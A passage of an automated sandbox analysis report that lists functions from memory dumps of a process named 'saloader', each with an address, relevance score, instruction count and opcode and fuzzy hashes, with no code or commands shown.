                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac1c9443a6696a32bee713c3247ba4f4a34bf90eee383f925aa1a4b3e73c2163
                                                                                          • Instruction ID: 54d86822f330b0dc3f3f726bf5a79a498ef5870e2a73951dc444095409698388
                                                                                          • Opcode Fuzzy Hash: ac1c9443a6696a32bee713c3247ba4f4a34bf90eee383f925aa1a4b3e73c2163
                                                                                          • Instruction Fuzzy Hash: CD113D30909A49CFE7A5EB29C15576177E1FF1A314F4444ADD08ECBA92CB2AFC85CB41
                                                                                          Function 00007FFAAC7E1A00 Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37febbc690505611ce833f75d42140f37e8b5e750b8f37c71d32ced724cb352a
                                                                                          • Instruction ID: f213487f68d47e69fa11a83b10f32d2b407d7921bd619975b852bd443413c718
                                                                                          • Opcode Fuzzy Hash: 37febbc690505611ce833f75d42140f37e8b5e750b8f37c71d32ced724cb352a
                                                                                          • Instruction Fuzzy Hash: 3D01BC2265EBC84FD746A76848A59613FF5EB5B11130900EBD48DCB2A3C909AC0AC3A2
                                                                                          Function 00007FFAAC7E87D7 Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 765857e233d6ff1e7c31199f893cdebcba5e67fa12c8a5a9e3e3ce46da3467de
                                                                                          • Instruction ID: 4000639adc3e06a19c97fc2a34840d6f9d83c32e5748079364c63ef4a7dd4495
                                                                                          • Opcode Fuzzy Hash: 765857e233d6ff1e7c31199f893cdebcba5e67fa12c8a5a9e3e3ce46da3467de
                                                                                          • Instruction Fuzzy Hash: CB114C6A9187128BE784777CF4E24FE37A0FF013A97048177D60EC8263DD28D88642C5
                                                                                          Function 00007FFAAC7E8998 Relevance: .1, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1e1cba74a776add3d90964a494f99eb391702f8f511fa4700d90fab8ae121182
                                                                                          • Instruction ID: 365f6f2470a67b280e7f290eda9afac0bdd27d44c018bc8b3ba755dd317cc4c1
                                                                                          • Opcode Fuzzy Hash: 1e1cba74a776add3d90964a494f99eb391702f8f511fa4700d90fab8ae121182
                                                                                          • Instruction Fuzzy Hash: 5001F732B0E91A4BEAD4F22CB8416FE73E1EFC9215B444577E84DC224AEE1DD88543C1
                                                                                          Function 00007FFAAC629DE9 Relevance: .1, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ce59a5ea827621ba994377ee13fb936b21dfa3de38d5aa0c92aecdbc743bdbd1
                                                                                          • Instruction ID: d8f664cbe2e5d4cb0674c214470c7111d908fc78b820643c3771a319532fdf9a
                                                                                          • Opcode Fuzzy Hash: ce59a5ea827621ba994377ee13fb936b21dfa3de38d5aa0c92aecdbc743bdbd1
                                                                                          • Instruction Fuzzy Hash: C801C075C8E6CA9FEB479B6448554E57FB0EF87210F0850E6E88CC6093E918999A8391
                                                                                          Function 00007FFAAC7E3438 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20e1095aa9003c73e95e455e9c00a3fdb22912874f0e841e7177f28d7ab9e310
                                                                                          • Instruction ID: 0a197710ebeadfe982d5511eecc18627825d0efe681aff2dfed8ab46a91b7514
                                                                                          • Opcode Fuzzy Hash: 20e1095aa9003c73e95e455e9c00a3fdb22912874f0e841e7177f28d7ab9e310
                                                                                          • Instruction Fuzzy Hash: AA11B731519D0A8FEFA9EB1DC094E6577E0FF2A315B4904A8D05EC76A1DB25EC84CB80
                                                                                          Function 00007FFAAC648FB0 Relevance: .1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5d8975663ebf3ba8c1e8db1a106ddf077f1f5b105edb4a07fcc32ebd13e69c86
                                                                                          • Instruction ID: 34ee110fd15b8c051eabac106520d857a0cac0f38bcc00f9fcfcf5e87ad12eea
                                                                                          • Opcode Fuzzy Hash: 5d8975663ebf3ba8c1e8db1a106ddf077f1f5b105edb4a07fcc32ebd13e69c86
                                                                                          • Instruction Fuzzy Hash: D401281054E58A4FE34BA738D8696B13BE1EF87201B0C91BAE14CC7197D91DE886C3C1
                                                                                          Function 00007FFAAC62FFB0 Relevance: .1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 239016bb814a6cf82939469841fd8a4967c599b27ad1f8e77994488186848bf6
                                                                                          • Instruction ID: f1a1af6c45a9a1470d7e2cbe11f3292c23c01b645d1c7539edbc85452a94bdba
                                                                                          • Opcode Fuzzy Hash: 239016bb814a6cf82939469841fd8a4967c599b27ad1f8e77994488186848bf6
                                                                                          • Instruction Fuzzy Hash: E101DB61A3DD454BA76CE769A4898F777D5FB99320710907FE01FC35D7EC14E80A8284
                                                                                          Function 00007FFAAC7E9210 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bdcdd379476a4c7218479f26eaae1a235a003702a5f0ad3df5516181ae00da93
                                                                                          • Instruction ID: 4fa4d30d0bb76bf1a30ec98acdc3038a25bd08f582aa469cc88f56e25e4f7aa1
                                                                                          • Opcode Fuzzy Hash: bdcdd379476a4c7218479f26eaae1a235a003702a5f0ad3df5516181ae00da93
                                                                                          • Instruction Fuzzy Hash: 4001C23170DA184FDBA5DB5CA894AA07BE0EF6E32170502F7E04CCB2A6C515DC85C3D1
                                                                                          Function 00007FFAAC7E17A2 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb525dad1d96079f84a925cd34780a88555bfbbb975472659ec1ac8315ba90e9
                                                                                          • Instruction ID: 09e5d7a786db20b23281a764c1fd3982631e04ae3ca8b7037f955c231616a988
                                                                                          • Opcode Fuzzy Hash: cb525dad1d96079f84a925cd34780a88555bfbbb975472659ec1ac8315ba90e9
                                                                                          • Instruction Fuzzy Hash: F201F753B1EA8A4FF769966C64162F977C0EF9A210B0442BEE05FC7287CD08D84982C5
                                                                                          Function 00007FFAAC7E5C64 Relevance: .1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 22a8cc02dde11d0764e048060971ef2d0424e21c8e221e35813bd4c5044db701
                                                                                          • Instruction ID: 52470ea54d0568bd230ac8214ba3497077ab5847e1f42838e90e6b7263859ae4
                                                                                          • Opcode Fuzzy Hash: 22a8cc02dde11d0764e048060971ef2d0424e21c8e221e35813bd4c5044db701
                                                                                          • Instruction Fuzzy Hash: ECF0D67250D60C9FFB889A15DC466B637E4EB87324F00001EE04E82052E722A417C750
                                                                                          Function 00007FFAAC6594C0 Relevance: .1, Instructions: 51COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8531881b07038a29464c6260490eac5224cfa73b37c46894fe9df3f47d850af8
                                                                                          • Instruction ID: b33a71c9be8800b4a5c6b1467e5a67cf66b28995996f9312d48dd1589622f0b6
                                                                                          • Opcode Fuzzy Hash: 8531881b07038a29464c6260490eac5224cfa73b37c46894fe9df3f47d850af8
                                                                                          • Instruction Fuzzy Hash: 96F09021B19D0D4FE6B4D75DA499B7267C2EFD936172491BAE00CC3399D914DC4683C1
                                                                                          Function 00007FFAAC66BEF0 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc650c813340131982898994f12c8ce9d4154854e2d03e7b9e8620b77104f0a8
                                                                                          • Instruction ID: 79ba7492404bb8823147cb62dc58bea980a365fafac93d33b30aa9dba6c7e19d
                                                                                          • Opcode Fuzzy Hash: fc650c813340131982898994f12c8ce9d4154854e2d03e7b9e8620b77104f0a8
                                                                                          • Instruction Fuzzy Hash: 66018460A0EB868FE79BD76C08651346BE1DF9B20071950FBD04DCB2B3D958DC0A8791
                                                                                          Function 00007FFAAC7E29B1 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a5e43dceec8f868b9a436dd5832249c3760bdcdf1fe34c4999a5de77a7c4ef08
                                                                                          • Instruction ID: dee083bc8ac0e63ec961b76b4a598c386c22a4a0e4fc0e868f1fd1b5e8a87436
                                                                                          • Opcode Fuzzy Hash: a5e43dceec8f868b9a436dd5832249c3760bdcdf1fe34c4999a5de77a7c4ef08
                                                                                          • Instruction Fuzzy Hash: 220144759197CE8FEB95DF14C4917E93BA1FF45304F4444A9E81D87282CB35D819CB81
                                                                                          Function 00007FFAAC64FCF0 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c27cb5f990be51f2490059092305e6481b0fb8df9ca29b031d174a12ed356b4f
                                                                                          • Instruction ID: 986bfd7a5611606975446568394171af3ee974f3d2183e9a480b95e1170314d0
                                                                                          • Opcode Fuzzy Hash: c27cb5f990be51f2490059092305e6481b0fb8df9ca29b031d174a12ed356b4f
                                                                                          • Instruction Fuzzy Hash: 44F06D30B19E098FE7A9EB6D8484A32B2D6FBED315710457DD00DC3396ED25E846C780
                                                                                          Function 00007FFAAC61D4F4 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a6317e0641d78439cd7ed8d87b5a722c65827409778700cd0d724a9f39cf3f5b
                                                                                          • Instruction ID: abbcb3d4904aee50804f67fa7d064b49baa1273c0a0fe6e3a25209bc0b59af65
                                                                                          • Opcode Fuzzy Hash: a6317e0641d78439cd7ed8d87b5a722c65827409778700cd0d724a9f39cf3f5b
                                                                                          • Instruction Fuzzy Hash: 83F0247151EA4CAFFB49DF08EC07ABA37A4EB87338F00106DE44EC3082D661A817C291
                                                                                          Function 00007FFAAC61FE1D Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 25fe0291652d4a5379730e41b881b63adc6b0800095a29b9c2471f014bbf472d
                                                                                          • Instruction ID: 4112d386807a080ea2b5b4ac74c8a22ee865c7f00ca8a30b1ed278bb74683b13
                                                                                          • Opcode Fuzzy Hash: 25fe0291652d4a5379730e41b881b63adc6b0800095a29b9c2471f014bbf472d
                                                                                          • Instruction Fuzzy Hash: 9901F57280EB864AF326D33088144D57BD1AB92221F085B7ED095CB1F2ED58954F83C3
                                                                                          Function 00007FFAAC7DFDDD Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1d9ce84c7b28e6f2ced794793d9083c9b8311a9dfebbedbd4eab0c3bc82fe93
                                                                                          • Instruction ID: c9599a2edfdeb97549d417c39d81030184be3fde327192f46ef30f167da2b8d0
                                                                                          • Opcode Fuzzy Hash: f1d9ce84c7b28e6f2ced794793d9083c9b8311a9dfebbedbd4eab0c3bc82fe93
                                                                                          • Instruction Fuzzy Hash: 4CF0963100D7449FD741DB64D851E97BBF0FFC6320F4946AAF04AC71A6DA24E6958BC2
                                                                                          Function 00007FFAAC6244C0 Relevance: .0, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 03a3e949387ce0f07536c06fd90971013062a0cea14afd9ba916e0f46a886617
                                                                                          • Instruction ID: 11a104e1c66cf3715eba72db400871a7345eab88659f019760d31ab7c24c990b
                                                                                          • Opcode Fuzzy Hash: 03a3e949387ce0f07536c06fd90971013062a0cea14afd9ba916e0f46a886617
                                                                                          • Instruction Fuzzy Hash: 49F0F631608A144BE745E728A888AA6BBD5DBED361F14473BE80CC32B4ED3482848386
                                                                                          Function 00007FFAAC660D88 Relevance: .0, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 41eb5d3e29ca7d78fd99a545669aaf2531842f74b1a1c8dadb85052982c58dce
                                                                                          • Instruction ID: dedd342fbd8eee4ec2f2b3c4d3bf361e5793cb68d374378714273abe09dfed54
                                                                                          • Opcode Fuzzy Hash: 41eb5d3e29ca7d78fd99a545669aaf2531842f74b1a1c8dadb85052982c58dce
                                                                                          • Instruction Fuzzy Hash: C2F0682065990ECFEF89EB2CC440D20F3D0EF29344754A1B8D00DC7291DA25FC46C740
                                                                                          Function 00007FFAAC61FFB0 Relevance: .0, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 44451613aba4c8071b822da6eda8c61b8c5d11e752a97ebce7f6adf36b38f767
                                                                                          • Instruction ID: 0dc5f0971d73d690f17d5dcf3e0b3d693b6fd222a4d7f48cfedbc72d4d4aad75
                                                                                          • Opcode Fuzzy Hash: 44451613aba4c8071b822da6eda8c61b8c5d11e752a97ebce7f6adf36b38f767
                                                                                          • Instruction Fuzzy Hash: 06F06871D2DA094AF750FB38940967AF6D0FF88355F005A7AA88DD2161FE38D58446C2
                                                                                          Function 00007FFAAC7E875D Relevance: .0, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dd45ff58621598828bd38ef770fba6312ee9474e19e955a918508c9a9d75f8e0
                                                                                          • Instruction ID: aea9ec62fe4131abde7797607c3ba2eff73500990bc5d397f3053a63372b2637
                                                                                          • Opcode Fuzzy Hash: dd45ff58621598828bd38ef770fba6312ee9474e19e955a918508c9a9d75f8e0
                                                                                          • Instruction Fuzzy Hash: 2DF0F06691CE0B8FE39697BC14616A03BF1FF4A350B8540E6D40CCA287EA1CCC868382
                                                                                          Function 00007FFAAC7E7D9D Relevance: .0, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2bf830c51169d901e00efb5237d0eb09c6b01aa1635d2877cc63608cfe185346
                                                                                          • Instruction ID: bfcd1583e44335bcc305f276073a13a54a5e0fc53a336eb54bfe221745ca4cc9
                                                                                          • Opcode Fuzzy Hash: 2bf830c51169d901e00efb5237d0eb09c6b01aa1635d2877cc63608cfe185346
                                                                                          • Instruction Fuzzy Hash: 29F0E93A90A60ECBE758D745D8461F8B3A4EF81210F504379D46D83691DF296C5E46C1
                                                                                          Function 00007FFAAC63D780 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0520b2fbf26b5ca280cea20e596c9adbb3084bc1bef9cab99fa49ff465fabbd0
                                                                                          • Instruction ID: a0942005567f13d641bff8c8ab33b54bca38f9cc4d70e06a51df0b9ec774eccd
                                                                                          • Opcode Fuzzy Hash: 0520b2fbf26b5ca280cea20e596c9adbb3084bc1bef9cab99fa49ff465fabbd0
                                                                                          • Instruction Fuzzy Hash: 02E0652062981A47F69DE32C95486B961E1EB8A310F54A539E40DC728ADD18ECC543C5
                                                                                          Function 00007FFAAC7E87BD Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4b23ca3eb2997b64b68d026315bf10879707ac310970d979f82363876dfeb105
                                                                                          • Instruction ID: cc3882f70c34faa37923ecb8bf953b6f1cfe4242b60eeda3ad952fc3d42dbde6
                                                                                          • Opcode Fuzzy Hash: 4b23ca3eb2997b64b68d026315bf10879707ac310970d979f82363876dfeb105
                                                                                          • Instruction Fuzzy Hash: 75F06D1691EBD60FE393533858655A43FB0AF0720074A40E3D448CF1E3DA0C8C8A8396
                                                                                          Function 00007FFAAC7DC4BD Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b1b3d3d70e9f7074f3dda6a560084300f11b1fba705559f3a48d43879be5cce
                                                                                          • Instruction ID: b37376fc7a534b1d747badb0c2904c8f1273b824c28a624dce6f07a53e46145d
                                                                                          • Opcode Fuzzy Hash: 0b1b3d3d70e9f7074f3dda6a560084300f11b1fba705559f3a48d43879be5cce
                                                                                          • Instruction Fuzzy Hash: 03E0CD25F5541D4ABE01B374A4565FDB255FFC5200FC04472D10DC2083DD1855050581
                                                                                          Function 00007FFAAC7DA4CD Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 91bab46ebf9ec0fbc48d3d891f5877adc67adb41e2db4b85bff6d4b807a2286a
                                                                                          • Instruction ID: f44455bb44f970a302296ae2cd23b3400440b5e05193fe270cde68eeddb4618b
                                                                                          • Opcode Fuzzy Hash: 91bab46ebf9ec0fbc48d3d891f5877adc67adb41e2db4b85bff6d4b807a2286a
                                                                                          • Instruction Fuzzy Hash: 2FE0C265F6580A4EBE00B374A85AAFDB2A6FF85200FC08872E10EC2183DD18A8050582
                                                                                          Function 00007FFAAC7DDA4D Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a4bc3daf76359c47da9ec16552b124f19ecd063012029466cd92495746cef013
                                                                                          • Instruction ID: f3914a05ea9a6a3efdf7dde4becf632ce5510a062f0b4fc22e6ba24aa7b423bd
                                                                                          • Opcode Fuzzy Hash: a4bc3daf76359c47da9ec16552b124f19ecd063012029466cd92495746cef013
                                                                                          • Instruction Fuzzy Hash: 69E0C225F5980A4ABF00F374A85AAFDB2A6FFE5200FC08872E50EC2083CD18A91505C1
                                                                                          Function 00007FFAAC7DCC2D Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6bd7f6b50459fdaf540d2358b65b7fa7611e44ab6028f61bb12d3a7d5ba9c10d
                                                                                          • Instruction ID: 6b01691a22398eeb4cdfb8735780300faefc26a662bff669afc6bea85f814a5b
                                                                                          • Opcode Fuzzy Hash: 6bd7f6b50459fdaf540d2358b65b7fa7611e44ab6028f61bb12d3a7d5ba9c10d
                                                                                          • Instruction Fuzzy Hash: 6CE0C265F5580A8EBE01F374A89AAFDB296FF95201FC09872E10EC3083CD1CA4050581
                                                                                          Function 00007FFAAC610CFD Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ddf28ec69cc24c7204644c8f90048cd79314146f8607bb52fbb76ec34feb2442
